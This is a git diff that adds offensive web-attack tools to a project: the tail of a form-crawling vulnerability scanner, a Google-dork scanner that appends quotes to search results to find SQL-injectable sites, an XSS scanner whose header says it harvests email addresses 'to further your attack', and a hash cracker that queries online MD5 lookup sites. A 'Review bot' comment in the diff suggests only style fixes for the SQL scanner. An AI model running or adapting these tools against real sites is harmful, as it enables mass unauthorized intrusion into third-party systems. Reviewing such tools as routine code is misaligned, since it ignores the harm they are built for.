actionurl[:11].lower()=="javascript:": continue + actionurl=fullpath(actionurl,pageinfo[2]) + + print "ACTION:",actionurl + + # get the input variables + poststring="" + inputarr=sre.sub("(.*?)\]*)\>(.*?)","\\2|ZZaaXXaaZZ|",frmbody).split("|ZZaaXXaaZZ|") + for j in range(len(inputarr)): + + name=getattrval(inputarr[j],"name") + if name==inputarr[j] or name=="" or name=="\"\"": continue + + value=getattrval(inputarr[j],"value") + if value==inputarr[j] or value=="" or value=="\"\"": value="" + + if poststring!="": poststring+="&" + poststring+=name+"="+value + + # get select/option tags + selectarr=sre.sub("(.*?)\]*)\>(.*?)","\\2|ZZaaXXaaZZ|",frmbody).split("|ZZaaXXaaZZ|") + for j in range(len(selectarr)): + + name=getattrval(selectarr[j],"name") + if name==selectarr[j] or name=="" or name=="\"\"": continue + + value=sre.sub("(.*?)\]*)value=(\"|'|)([^\\3\ ]*)\\3([^\>]*)\>(.*?)","\\2",selectarr[j]) + if value==selectarr[j] or value=="" or value=="\"\"": value="" + + if poststring!="": poststring+="&" + poststring+=name+"="+value + print "sel/opt: "+name+"="+value + + if poststring=="": continue + + if sre.search("method=([\'\"]|)post([\'\"]|)",frmsect[:frmsect.find(">")].lower())==None: + if actionurl.find("?")!=-1: actionurl+="&" + else: actionurl+="?" + actionurl+=poststring + body+='' + print 'GETT ' + continue + + # determine if it needs to be scanned, and if so, scan it + postscan=0 + postvars=poststring.split("&") + if postfields.has_key(actionurl): + for j in range(len(postvars)): + postvars[j]=postvars[j][:postvars[j].find("=")] + if postfields[actionurl].count(postvars[j])==0: + postfields[actionurl].append(postvars[j]) + postscan=1 + else: + for j in range(len(postvars)): postvars[j]=postvars[j][:postvars[j].find("=")] + postfields[actionurl]=postvars + postscan=1 + + if postscan==1: + vulns=checkvars(actionurl,poststring) + if not listempty(vulns): dispvulns(vulns,actionurl) + + print "BB" + + # check for urls in "href" tags + # ? # part of 3? 
(src|href|location|window.open)= and http:// + urlreg="(\'|\")(?!javascript:)(([^\>]+?)(?!\.("+ignorefileext.replace(",","|")+"))(.{3,8}?)(|\?([^\>]+?)))" + urlarr=sre.sub("(?s)(?i)(.+?)((src|href)=|location([\ ]*)=([\ ]*)|window\.open\()"+urlreg+"\\6","\\7|ZZaaXXaaZZ|",body).split("|ZZaaXXaaZZ|") + del urlarr[len(urlarr)-1] + urlarr.append(sre.sub("(?s)(?i)(.+?)(src|href)="+urlreg+"\\3","\\4|ZZaaXXaaZZ|",body).split("|ZZaaXXaaZZ|")) + del urlarr[len(urlarr)-1] + for i in range(len(urlarr)): + + theurl=fullpath(urlarr[i],pageinfo[2]) + if not checkserver(servername(theurl)): continue + + # determine if it needs scanned and/or treed, and if so, scan and/or tree it + getscan=0 + if theurl.count("?")!=0: + nqurl=theurl[:theurl.find("?")] + query=theurl[theurl.find("?")+1:] + query=sre.sub("\&\;","\&",query) + qryvars=query.split("&") + if urlfields.has_key(nqurl): + for j in range(len(qryvars)): + qryvars[j]=qryvars[j][:qryvars[j].find("=")] + if urlfields[nqurl].count(qryvars[j])==0: + urlfields[nqurl].append(qryvars[j]) + getscan=1 + else: + for j in range(len(qryvars)): qryvars[j]=qryvars[j][:qryvars[j].find("=")] + urlfields[nqurl]=qryvars + getscan=1 + else: + if urlfields.has_key(theurl)==False: urlfields[theurl]=[] + nqurl=theurl + + if getscan==1: + vulns=checkvars(theurl) + if not listempty(vulns): dispvulns(vulns,theurl) + tree=treeglob + if treedurls.has_key(nqurl): + if treedurls[nqurl].count(theurl)==0 and len(treedurls[nqurl])<=scanlimit: + treedurls[nqurl].append(theurl) + else: tree=0 + + else: treedurls[nqurl]=[theurl] + if tree==1 and level+0$XfBIJ!r~Da~_~|cBPcNSNr5~NSTqc zc;rk;76v6H+pM6iG~kQ|MYwUstE>P%66Yj{qJlCG7Bo+Skdl2|Zb(21P?T-Snu5!q zEON$KN?G!!pau8SH;1Ha#Q1mIcKB z-3PFnZMQ&VjuX)ph?NPQOqb3m2ZoZkzo&!{lUc&k{#vB{!S_zxM)2g1Ew{42W5K$z zFFcVP`6r@FQWYJMnh<#fdxS{e{GPTx{9fKxRCd=T!j4X2@+!`6mgHUD)(xr3CaNo? 
zFGI;I%q~d%R22rR6W-^H8qPP=&bgnTRK-&XkXM*EbSd1>@be8>l7AyinX$I|8aMNk z4NdYT`G{0JOEH78OLrIo8cc#zXlA>ZeQM!e^mldd`owh(6o}9x%DaL>BB81 zB<3k*pmP+jpt8Ljk3r0kZ<0*O^)>me*ipngHoYLvX&M28gJNi+1*bQs$lmei2aXZ$ z?b~dZM#8O*3^6nWs9N=L_j z@h***Fe?<19DV#OInukh1_J(6WbrO;#Rqr`cpW~t@Z*#4kGsJr!n5&NVm!&wC1@%Pla6f_{F=H?SNJP_^MxZfU^S<~qrb8UaPD{+zx62do zl{9TV;k}F}sVb^T)rx+AI8}EA4}ZXaFqRh=7gO?*_|E7@JN()Xzp=xWBf#T+7kTv` zmwZPiKg@ody`H^kr;<1b+<(YjHMC#@P{iTqda~71t2gF4M`X(hBKp(L)Z=;@_538E zdPDoH6*S^Vt)yXKCjl!P7QEmM*^BSV0rOOAd`H?kcykDtHSMHwn>r z;I5G+(I+08YtoV0Z*bbw*9Be)ETJ@?fU-$vtC;&y3Vl>nfv2xQoq)$sz@F=J5?6!!fYHnIUUwGP)hbjI&3&1I&O>jgaauS5aPpp}@xlBQKV3gx6dEnXcN9FEQ9Tf9p?F>~Ve;s2Al z`vne^ZT#Ejfcv+?hc z*FD+01V+6|#@9Y~$%~&~m9JZ##hs&jB@$g1<=+P4PTRaj%R}UKkm9xY1B92itC>jb zTg>T4Q2PA&bIl~7iq`&M({3@weejXq*#eHGZc|}(x|?@Fw^N_Z&FU#d+I$k?_oH;J ztxxp>gJGsfgDDFl8Y!=?SW4|Bw{wN5FIAF~zl%>!=UL#Xm*ee$Hia!T=OX9Ki@6c}XAn)-YZ{(ovSg8ql5QZfY&taJD(z2qprsSs%i1PAN z7Zl1WO6_G&S3#3qgm3<9g{Xquz*9i2YQB3N5J$`mSXFiyTB6ZIqpD4|HBq&`am21o z@l29=f_2On{~q(CT%8=Yi8YBbgC>z?2BVo?LS?WQI2AmqzQZH~R?n?!`=Rb3MxRXy z*T~yt|A0rv0#I|!g6(~Pzj8@P1-0Vk&i9S?h&oOqw^4!_MVQX_ zG%L#LZ!bt_QTCud5%Z=14bcL1i5lL@Q!8EZsVNAPoL<7~0gRK*L`_#Lw1G8=wWvi{zvDixM6%DIgcCQq-|ux~oxe3*8%Vv6EuwhWLOs7m zBe=@ptIgcI57_3@CT3+;Jl3?{W0#@F-?B&%tq>Sl$N*D8dE4oloieK~eY8yzW zwFNaw8B0Fd9F}pN`W}bDhQ)b=3;LfOW!gr(m|H+gu&uGShT0ryTcB-mJ`!eogpLKs z79ZadAm6-C|A@oB-DCfl%f9M!)7X1PYkJREP1gC@#Vle*7ZkvBvJEHGcD5{M!g?OG zXF=+XT}u+sF(c9Y?kS*6(CmjAR(h|`tf2Q(B*@y#b});W(FH?T4T;s~)sj|oR&7Z& z=G2r@Lq=^0wdB*9PE*9xzGCPpwtiyiCDuNo?IF^o!w?1E5INO71+)p8{g4p;Jx=wb zOYXbT$1Gw-Qwkv8v3n|IQ0I@zaa6?-7Ywd1^ifh9S0A&88BJMTR6LQvV^Pw2r7|3G z!Qi?+NR}9xLu8APJwUej91YL0=o}A@$vN>xthHTXX5T7Y>sBjz1Xde^>QRTRZ9(tYHmnSi}1B>whquUycA! F001d(#tHxc literal 0 HcmV?d00001 diff --git a/3rdparty/Scan.py b/3rdparty/Scan.py new file mode 100644 index 0000000..864f7bd --- /dev/null +++ b/3rdparty/Scan.py 
@@ -0,0 +1,63 @@
+#PYTHON SQL Injection vulnerability scanner (Powered by Google.)
+#Coded by : wh4tsec
+#GNU General Public License, version 2 (GPL-2.0)
+
+
+#!/usr/bin/python
+import urllib2
+import sys
+
+# Name of the output file ex: vul.dat
+filename = "vul.dat"
+
+# This function gets a site url and returns 1 if its vulnurable. else, 0 will be returned
+def isvul ( url ):
+ usock = urllib2.urlopen(url)
+ data = usock.read()
+ usock.close()
+ if "You have an error in your SQL" in data:
+ return 1;
+ elif "supplied argument is not a valid MySQL result resource in" in data:
+ return 1;
+ elif "Division by zero in" in data:
+ return 1;
+ elif "Microsoft JET Database" in data:
+ return 1;
+ elif "Microsoft OLE DB Provider for SQL Server" in data:
+ return 1;
+ elif "ODBC Microsoft Access Driver" in data:
+ return 1;
+ elif "Unclosed quotation mark" in data:
+ return 1;
+ elif "Microsoft OLE DB Provider for Oracle" in data:
+ return 1;
+ elif "Incorrect syntax near" in data:
+ return 1;
+ elif "SQL query failed" in data:
+ return 1;
+ return 0;
+# Gets inputs from user
+dork = raw_input("Enter dork: ")
+ttld = raw_input("Enter tld: ")
+lng = raw_input("Language: ")
+results = raw_input("Results: ")
+
+file = open(filename,"w")
+print 'WORKING',
+
+# Getting matched urls from google
+from google import search
+for url in search('inurl:' + dork, tld='' + ttld, lang='' + lng, stop=(0 + int(results))):
+ url = url + "'"
+ print '.',
+ if isvul(url) == 1:
+ file.write(url)
+ file.write("\r\n")
+ print 'BOOM!',
+
+file.close()
+
+print "\r\nDone, urls of vulnurable sites saved in 'vul.dat'"
+print "coded by: wh4tsec"
+print "------------------------------------------------------"
+print "Credits: BeautifulSoup-2.3.0 And Google Search Python"
diff --git a/3rdparty/XSSscan.py b/3rdparty/XSSscan.py
new file mode 100644
index 0000000..13d4e60
--- /dev/null
+++ b/3rdparty/XSSscan.py
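Review bot: The `#!/usr/bin/python` line is the sixth line of the file, below three comment lines and two blanks, so it is not an interpreter directive and the script cannot be run directly; move it to line 1, above `#PYTHON SQL Injection vulnerability scanner (Powered by Google.)`. `import sys` is unused, and `file = open(filename,"w")` shadows the `file` builtin and is left open if the loop raises — `with open(filename, "w") as out:` fixes both. `from google import search` is a third-party package imported mid-file, with no requirements file or version pin anywhere in this hunk; the `3rdparty/` directory would benefit from a manifest recording each script's origin, its stated license (this one declares GPL-2.0) and the dependencies it pulls in.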
@@ -0,0 +1,326 @@ +#!/usr/bin/python +#XSS Scanner that can find hosts using a google query or search one site. +#If XSS is found it attempts to collect email addresses to further your attack +#or warn the target of the flaw. When the scan is complete +#it will print out the XSS's found and or write to file, it will find false positives +#so manually check before getting to excited. It also has verbose mode and +#you can change the alert pop-up message, check options!! +# +#Changelog v1.1: added options, verbose, write to file, change alert +#Changelog v1.2: added more xss payloads, an exception, better syntax, more runtime feedback +#Changelog v1.3: added https support, more xss payloads, the ability to change port, fixed some user input #problems, exiting without error messages with Ctrl-C (KeyboardInterrupt) +# +#http://darkcode.ath.cx +#d3hydr8[at]gmail[dot]com + +import sys, urllib2, re, sets, random, httplib, time, socket + +def title(): + print "\n\t d3hydr8[at]gmail[dot]com XSS Scanner v1.3" + print "\t-----------------------------------------------" + +def usage(): + title() + print "\n Usage: python XSSscan.py
', html) + + if match: + return match.group().split('b>')[1][:-2] + + return None + + +class THEKAINE: + + name = "thekaine" + url = "http://md5.thekaine.de" + supported_algorithm = [MD5] + + def isSupported (self, alg): + """Return True if HASHCRACK can crack this type of algorithm and + False if it cannot.""" + + if alg in self.supported_algorithm: + return True + else: + return False + + + def crack (self, hashvalue, alg): + """Try to crack the hash. + @param hashvalue Hash to crack. + @param alg Algorithm to crack.""" + + # Check if the cracker can crack this kind of algorithm + if not self.isSupported (alg): + return None + + # Build the URL + url = "http://md5.thekaine.de/?hash=%s" % (hashvalue) + + # Make the request + response = do_HTTP_request ( url ) + + # Analyze the response + html = None + if response: + html = response.read() + else: + return None + + match = search (r'

[^<]*', html) + + if match: + + match2 = search (r'not found', match.group() ) + + if match2: + return None + else: + return match.group().split('b>')[1][:-2] + + + +class TMTO: + + name = "tmto" + url = "http://www.tmto.org" + supported_algorithm = [MD5] + + def isSupported (self, alg): + """Return True if HASHCRACK can crack this type of algorithm and + False if it cannot.""" + + if alg in self.supported_algorithm: + return True + else: + return False + + + def crack (self, hashvalue, alg): + """Try to crack the hash. + @param hashvalue Hash to crack. + @param alg Algorithm to crack.""" + + # Check if the cracker can crack this kind of algorithm + if not self.isSupported (alg): + return None + + # Build the URL + url = "http://www.tmto.org/api/latest/?hash=%s&auth=true" % (hashvalue) + + # Make the request + response = do_HTTP_request ( url ) + + # Analyze the response + html = None + if response: + html = response.read() + else: + return None + + match = search (r'text="[^"]+"', html) + + if match: + return decodestring(match.group().split('"')[1]) + else: + return None + + +class MD5_DB: + + name = "md5-db" + url = "http://md5-db.de" + supported_algorithm = [MD5] + + def isSupported (self, alg): + """Return True if HASHCRACK can crack this type of algorithm and + False if it cannot.""" + + if alg in self.supported_algorithm: + return True + else: + return False + + + def crack (self, hashvalue, alg): + """Try to crack the hash. + @param hashvalue Hash to crack. + @param alg Algorithm to crack.""" + + # Check if the cracker can crack this kind of algorithm + if not self.isSupported (alg): + return None + + # Build the URL + url = "http://md5-db.de/%s.html" % (hashvalue) + + # Make the request + response = do_HTTP_request ( url ) + + # Analyze the response + if not response: + return None + + html = None + if response: + html = response.read() + else: + return None + + match = search (r'Es wurden 1 m.gliche Begriffe gefunden, die den Hash \w* verwenden: